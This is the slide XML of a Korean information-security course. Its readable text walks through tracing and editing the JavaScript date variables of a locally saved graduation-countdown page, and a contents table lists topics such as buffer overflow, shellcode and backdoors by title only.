                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{335ED83F-6D0A-413C-B1AE-774D94FAA65D}"/>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C295DA-498C-453F-9128-6693778574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C33A0B68-AE7E-4782-8DB3-4FA80572583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BF72CE1C-E236-47A3-9C31-943A27CEE0F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692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kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>정보의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>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좋은 웹 사이트를 찾았다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남은 시간이 줄어드는 것을 보고있으면 가슴이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>웅장해진다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근데 졸업시간은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.. 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신데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페이지를</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수정해야 겠다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시간을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>수정하시오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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: 2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>년 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00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시</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진수를 프로그래밍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코드를 역 추적 하는 방법을 경험한다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79F8FB73-2BD4-477B-A393-B21B8149D461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3376551" y="4871853"/>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543327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Content/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>itCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/calendar.php-55.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 열어서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이 있는지 확인해보자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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>코드를 추적 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>추측</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>진수로 표현을 하였기 때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>초단위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t> 남은 시간임을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>다시 윗줄을 보니 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>변수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>으로 나누어 준 후 버림</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>Math.floor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>을 취한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t> 단위의 남은 시간임을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t> 는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>.getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>에서  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>today.getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>뺀것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>추측이 맞았다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>졸업 날짜는 바로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>적혀있을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t> 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>, Date( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygYYYY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygGradMonty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygGradDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygGradTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>  … ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
              <a:t>로 이루어져 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ygYYYY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 를 다시 검색해보자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코드를 찾았다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2025, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3, 7, 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바꾸고 페이지를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>새로고침</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42893F0B-BB75-49F6-9E0C-FB68161D4A9B}"/>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C2E6C3B6-1B9D-4BCE-8779-A298D22BAADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="510639" y="760886"/>
            <a:ext cx="5302332" cy="1162228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9EDB3B5-3C52-494A-9587-5AFA216ED003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="510639" y="4393561"/>
            <a:ext cx="5302332" cy="1445595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C45643-6E01-43B4-A174-E947C1AC67C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234814" y="368998"/>
            <a:ext cx="5616792" cy="6120000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0262206-2E2A-43BB-9440-7AEAE680DA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391170" y="510638"/>
            <a:ext cx="5304079" cy="2513301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="그룹 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15F0645B-B730-47A4-A616-29BD9066CD7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3CB962FB-F617-4A49-AA8D-F96BB8CCCAA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430467-F96F-4C1F-BA70-056A1C87D32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42437BF2-942E-4364-960D-4987B0FA1A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89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14" end="1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xEl>
                                              <p:pRg st="16" end="1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xEl>
                                              <p:pRg st="18" end="1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xEl>
                                              <p:pRg st="27" end="2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xEl>
                                              <p:pRg st="28" end="2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438090572"/>
              </p:ext>
            </p:extLst>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컴퓨터 언어 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>어셈블리어</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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> 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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>버퍼 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>오버플로우란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정보보호의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해킹실습 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>버퍼 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>오버플로우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 도서관 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- Link Library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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>쉘코드란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쉘코드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고전암호 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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 메모장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동적 메모리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현대암호 제작</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dirty="0" err="1"/>
                        <a:t>힙</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>오버플로우란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현대암호 제작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최적화</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고급언어의 약속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포맷스트링</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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Format String Bug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FSB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 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컴퓨터 관리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운영체제와 프로세스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a:t>– </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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>이란</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R </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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권한상승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백도어란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침해예방 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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침해예방 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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비인가 접근공격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A7AE72C-CC54-4ACD-9979-A07B94B7842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40F25D9D-E354-4300-A768-339F7AD0009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A8D2BB3-BD7C-429C-8D8B-3A9EF1E640D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3ADB8F8D-BE36-45B3-8F54-753F5F5CE5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932466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D1982716-9971-4DF9-9E7C-54DEB4D66C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1531089" y="2721934"/>
            <a:ext cx="9179442" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>43 =                                                          </a:t>
            </a:r>
            <a:r>
